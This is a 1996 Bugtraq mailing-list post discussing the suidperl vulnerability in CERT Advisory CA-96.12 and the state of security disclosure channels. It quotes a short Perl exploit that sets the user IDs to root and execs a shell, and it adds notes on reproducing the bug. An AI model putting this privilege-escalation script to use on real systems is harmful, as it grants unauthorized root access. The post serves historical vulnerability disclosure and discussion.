Bugtraq mailing list archives

Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability

From: rob () brasaap iaehv nl (Rob J. Nauta)
Date: Sun, 30 Jun 1996 11:54:01 +0200


On Fri, 28 Jun 1996 ichudov () algebra com wrote:


What is the exploit?


Run this as a suid or sgid script.  It doesn't matter what user or group
it's suid/sgid to...it gets root access.

#!/usr/bin/perl
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");


I think it's not entirely correct. I was able to reproduce the bug
with #!/usr/bin/suidperl -U as the first line. You need the -U or else
suidperl will complain about an insecure function being used. I also
used system("/usr/bin/id"); which is more obvious to verify whether the
bug exists.

Is it just me...or does it give people the willies knowing such an easy
to exploit hole was on their systems...perhaps for years.


Certainly ! I mean, I first heard about this via the CERT advisory while
I am on most security lists. I guess via the PERL newsgroups/mailing
lists there was an earlier alert, which the bad guys could've gotten,
a bad one for all security folks ! Nothing on bugtraq or the -alert
lists, I guess many sites could have gotten hacked by people reading
PERL news. This just shows 1) CERT alerts aren't that bad, by reading
it I reproduced an exploit in minutes 2) security lists aren't everything,
don't rely on them too much 3) the usenet security newsgroups are just
entertainment and have no useful purpose for discussing new bugs, just
general 'what is a firewall?' questions 4) bugtraq doesn't really meet
its 'full disclosure' charter, nobody who knew the bug bothered to send
in an exploit.

I checked an internet provider and they had a new suidperl with a date
of june 2nd which was a safe one. I guess they have better sources than
me, which is always a disappointment.

Rob

--
                               /;    ;\
                           __  \\____//     From the keyboard of
                          /{_\_/  \`'\_/__    Rob J. Nauta
   \;/                    \___   (o\  /o  }     rob () nauta it
 __//_______________________/          :--'       rjn () pobox com
/ //########            ####  \_    `__\
 // ######      ####   ####     \___(o'o)
=/    ###     #######    ###       `===='

Current thread:

Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability, (continued)
- - Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Andrew Liles (Jun 30)
    - Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)
    - Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Casper Dik (Jun 30)
  - Validating email sender Brendan McKenna (Jun 30)
    - Re: Validating email sender Squidge (Jun 30)
    - Re: Validating email sender Alan Brown (Jun 30)
    - Re: Validating email sender Casper Dik (Jun 30)
    - portmapper dangers der Mouse (Jun 30)
    - Re: portmapper dangers Julian Assange (Jun 30)
    - Re: portmapper dangers Casper Dik (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Rob J. Nauta (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability James Seng (Jun 30)
  - Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Jon Lewis (Jun 30)
- Re: [linux-security] BoS: CERT Advisory CA-96.12 - Vulnerability Michael Constant (Jun 30)